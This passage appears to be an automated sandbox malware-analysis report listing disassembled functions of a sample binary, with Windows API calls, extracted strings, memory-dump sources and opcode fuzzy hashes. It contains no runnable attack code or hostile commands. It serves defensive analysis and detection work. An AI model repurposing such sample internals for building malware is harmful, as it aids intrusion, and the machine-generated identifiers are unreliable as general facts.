                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 390db08f6b300ad102b0f9580dca13044ebd5d4a7e6a33e52d53daf9f2b8ec7b
                                                                                • Instruction ID: 2a12458c02ac084b6d3cff56500fcdc5356b3e1b8e466b9dd17387d1a7e23324
                                                                                • Opcode Fuzzy Hash: 390db08f6b300ad102b0f9580dca13044ebd5d4a7e6a33e52d53daf9f2b8ec7b
                                                                                • Instruction Fuzzy Hash: 95410A74E013099FDB14DF68C981BDA7BB5FB08304F10006AE919EB391D774A992CFA5
                                                                                Function 0041975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0041980E
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0041984A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: f94d3fad8e9a21d96bafe4859bb14c836b59fa8fc9d4ea9fd88669ef04fea1da
                                                                                • Instruction ID: 04c6a206a7942d214e2942a9d2be794cca72143debf597a9ade3e77b7f4e5310
                                                                                • Opcode Fuzzy Hash: f94d3fad8e9a21d96bafe4859bb14c836b59fa8fc9d4ea9fd88669ef04fea1da
                                                                                • Instruction Fuzzy Hash: 44318F71110204AEEB109F38CC91BFB73A9FF59764F00862AF8A9C7190CB34AC81D764
                                                                                Function 003F5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F51C6
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003F5201
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: bac25d60cc27dd0efb0c631fbe7afd1defdc81405031902e89ea0dc1ef6afbd4
                                                                                • Instruction ID: fbb79472d8a46810d5930de5f56896cfa6b6e5f9b560be9d35d6be6931ff51b0
                                                                                • Opcode Fuzzy Hash: bac25d60cc27dd0efb0c631fbe7afd1defdc81405031902e89ea0dc1ef6afbd4
                                                                                • Instruction Fuzzy Hash: 6931D53160070CBBEB26CF99D845BBEBBF8EF46350F154929EB85A61A0D7709A44CB10
                                                                                Function 0040658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __snwprintf
                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                • API String ID: 2391506597-2584243854
                                                                                • Opcode ID: 006448163e6c6f4bff2d95876d34e9c053389617e9aeff47d7e2d3b89b1ecea9
                                                                                • Instruction ID: 9ae9d63e1d334ab87043af54bc8173f6f2430f47454ae59425c4a344d9cd95df
                                                                                • Opcode Fuzzy Hash: 006448163e6c6f4bff2d95876d34e9c053389617e9aeff47d7e2d3b89b1ecea9
                                                                                • Instruction Fuzzy Hash: 6521C131600118AFCF11EF64C882FEE73B4AF45304F1104AAF506AF181DB79EA15CBAA
                                                                                Function 004193CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0041945C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00419467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 40174ae870f00778641e2e28cd3040eefa515e06ed78534c05c302aaa697b9f1
                                                                                • Instruction ID: 0d72a339671ec6f96f9897026764aa3a7ca9995fa2fe95199ff15f8b140044e0
                                                                                • Opcode Fuzzy Hash: 40174ae870f00778641e2e28cd3040eefa515e06ed78534c05c302aaa697b9f1
                                                                                • Instruction Fuzzy Hash: EF11B271300208BFEF15DE54DC90EFB376EEB883A4F10012AF919972A0D6399C928768
                                                                                Function 0041DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • GetActiveWindow.USER32 ref: 0041DA7B
                                                                                • EnumChildWindows.USER32(?,0041D75F,00000000), ref: 0041DAF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveChildEnumLongWindows
                                                                                • String ID: T1@
                                                                                • API String ID: 3814560230-611653980
                                                                                • Opcode ID: 8ed043ac8b82488aabd6843ade94509215cd029e2e38369aaaece2df50a47933
                                                                                • Instruction ID: 964ae18533100a9ecf5606c7913a1477e4a9c1bbed19a4a42cfcc31f52b14eef
                                                                                • Opcode Fuzzy Hash: 8ed043ac8b82488aabd6843ade94509215cd029e2e38369aaaece2df50a47933
                                                                                • Instruction Fuzzy Hash: 03212875604201DBC714DF28D851AA6B7E5EF59320F25462AE86A873E0D734B880CB68
                                                                                Function 004198FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
                                                                                  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
                                                                                  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00419968
                                                                                • GetSysColor.USER32(00000012), ref: 00419982
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: d4e75c036cca4202eb5fe0c8a3b7eb6ac1d628ce3acd0f6a6b6dd326610daf67
                                                                                • Instruction ID: b332cf302c00981b2729abf442500272e7131c93261fea144359ff3e59a3b4e4
                                                                                • Opcode Fuzzy Hash: d4e75c036cca4202eb5fe0c8a3b7eb6ac1d628ce3acd0f6a6b6dd326610daf67
                                                                                • Instruction Fuzzy Hash: 95113AB2520209AFDB04DFB8CC45EEA7BA8FB08344F05562DF955D3250E738E851DB64
                                                                                Function 00419617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00419699
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004196A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: e5298bc559ef51b2eb288408e6de2796c2f0b03e3f2b23f6dcecd25f9881d7d0
                                                                                • Instruction ID: a726c6fcf5115229e79f02a1ed018288463bfafd70fa286d5874dd15fffa874a
                                                                                • Opcode Fuzzy Hash: e5298bc559ef51b2eb288408e6de2796c2f0b03e3f2b23f6dcecd25f9881d7d0
                                                                                • Instruction Fuzzy Hash: 2C118C71500108ABEB115F64DC64EEB3B6AEB053B8F104326F965972E0C739DC919B68
                                                                                Function 003F5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F52D5
                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003F52F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 1d51b483f10d61eed2cfb0d4fa42976cb0b583cf9baf94be702fcb86c52801c5
                                                                                • Instruction ID: d1cdcafac6bd518fafa9fa9b4cca568f41df371771a691f6e8635877e911806f
                                                                                • Opcode Fuzzy Hash: 1d51b483f10d61eed2cfb0d4fa42976cb0b583cf9baf94be702fcb86c52801c5
                                                                                • Instruction Fuzzy Hash: 5611223A900628BBDB22DB9CD944BBD77B8AB05754F060122EB85E72B0D3B0ED00C791
                                                                                Function 00404D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00404DF5
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00404E1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 5e3a917c8818176427d1357d564cc97d27d21a05a25243e5aabcc0542ab93bdc
                                                                                • Instruction ID: d4b38fc1ba60aa77f583ba11f2768e3ab93b33640093434301541c70d1081515
                                                                                • Opcode Fuzzy Hash: 5e3a917c8818176427d1357d564cc97d27d21a05a25243e5aabcc0542ab93bdc
                                                                                • Instruction Fuzzy Hash: 5111CEB0500221FADB248F51C888EFBFAA8FF46350F10823BF20566280D3785941D6F4
                                                                                Function 003DA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003E37A7
                                                                                • ___raise_securityfailure.LIBCMT ref: 003E388E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                • String ID: (G
                                                                                • API String ID: 3761405300-2483643444
                                                                                • Opcode ID: 639bd6b539a3ae372a5f3c4a0ca7db6ebf650db84b69b112c6237bcb71e04b4b
                                                                                • Instruction ID: 3dd35adeb2b665ba067b9a11e352462323cc01c3b6c0c8426fb9888e0214d45f
                                                                                • Opcode Fuzzy Hash: 639bd6b539a3ae372a5f3c4a0ca7db6ebf650db84b69b112c6237bcb71e04b4b
                                                                                • Instruction Fuzzy Hash: 3E21DDB5502704DAE710DF55EA856007BB5BB48310F20983AE90D8B3A0E3F4A9C0CF8E
                                                                                Function 0040A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0040A88B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: htonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 3832099526-2422070025
                                                                                • Opcode ID: 01d5254699725b55968b4d6abe7f1036c01df0f6c8dcb18a7c3ac883a275c569
                                                                                • Instruction ID: d4418a55dc29d08890a61421d980e567cd4b21ec7e9d527c8c9a7438334c5c3c
                                                                                • Opcode Fuzzy Hash: 01d5254699725b55968b4d6abe7f1036c01df0f6c8dcb18a7c3ac883a275c569
                                                                                • Instruction Fuzzy Hash: 4D01C475600304ABCB11EF68D846FADB364EF44314F10953BF516AB3D1D775E812875A
                                                                                Function 003EB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003EB7EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 9517932f3740bf6437049482aa0fc9740e59b7d99693dce531c207c986011198
                                                                                • Instruction ID: 42a566bebcb678845413b435001f473286ebcee2eaecd1ae8d61f43315eaf504
                                                                                • Opcode Fuzzy Hash: 9517932f3740bf6437049482aa0fc9740e59b7d99693dce531c207c986011198
                                                                                • Instruction Fuzzy Hash: 7001F171610164ABCB06EBA4CC42AFEB369AF46354B10071DF4726B2D2EBB059088B94
                                                                                Function 003EB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 003EB6EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 19e6702e1fcf73ee95b14169ff93e18e8fed9a266bbcf7f63d24e3c52642f220
                                                                                • Instruction ID: 0fdece635e70095cb63850193656bf000b87b9bf7881b16332c2c01159222b79
                                                                                • Opcode Fuzzy Hash: 19e6702e1fcf73ee95b14169ff93e18e8fed9a266bbcf7f63d24e3c52642f220
                                                                                • Instruction Fuzzy Hash: 7C018F71641054ABCB17EBA5C952BFFB3B89B06344B100129B502B71C1EB949F188BA5
                                                                                Function 003EB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 003EB76C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 66b10371786c3ce6b3524d303b4c4ae94ca43bf255bffcd0055c024272000186
                                                                                • Instruction ID: dbc841a052969ac3bcab04eda6fde344ca7fa34960c68e192d804b75221542f6
                                                                                • Opcode Fuzzy Hash: 66b10371786c3ce6b3524d303b4c4ae94ca43bf255bffcd0055c024272000186
                                                                                • Instruction Fuzzy Hash: 3E01A275640154BBCB13E7A4CA02BFFB3AC9F05344B100119B501B75D2EBA49F1987B5
                                                                                Function 003D4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: "G
                                                                                • API String ID: 3494438863-2872772239
                                                                                • Opcode ID: 4a2d1971cba56e72ac701c2de824896a273bc0b9486b7fdb8d436a435e7f6e84
                                                                                • Instruction ID: 71c010163d720531c0af4da9b8721ba6335d0e37e02ad92c2fd3fccc679e58f3
                                                                                • Opcode Fuzzy Hash: 4a2d1971cba56e72ac701c2de824896a273bc0b9486b7fdb8d436a435e7f6e84
                                                                                • Instruction Fuzzy Hash: 1DF0C2722496019BE7269F19BD516A667D6E704720B10817BF208CE397F7B0C8C18B99
                                                                                Function 003B4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(003B0000,00000063,00000001,00000010,00000010,00000000), ref: 003B4048
                                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,003F67E9,00000063,00000000,76C20280,?,?,003B3EE1,?,?,000000FF), ref: 004241B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: EnumImageLoadNamesResource
                                                                                • String ID: >;
                                                                                • API String ID: 1578290342-352282309
                                                                                • Opcode ID: afe88f9ceee58952c828d337f841cb04410cf1a0decb1e073c8805f2cf59483f
                                                                                • Instruction ID: 37b100b01560ef45af1f1c8b8e344beb6ce14b7595ce8899a8804c9905aa2572
                                                                                • Opcode Fuzzy Hash: afe88f9ceee58952c828d337f841cb04410cf1a0decb1e073c8805f2cf59483f
                                                                                • Instruction Fuzzy Hash: C5F06D31640364B7E2205B1ABC4BFD23BADE758BB5F104526F318AA5E0D2E090C08A98
                                                                                Function 003F7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
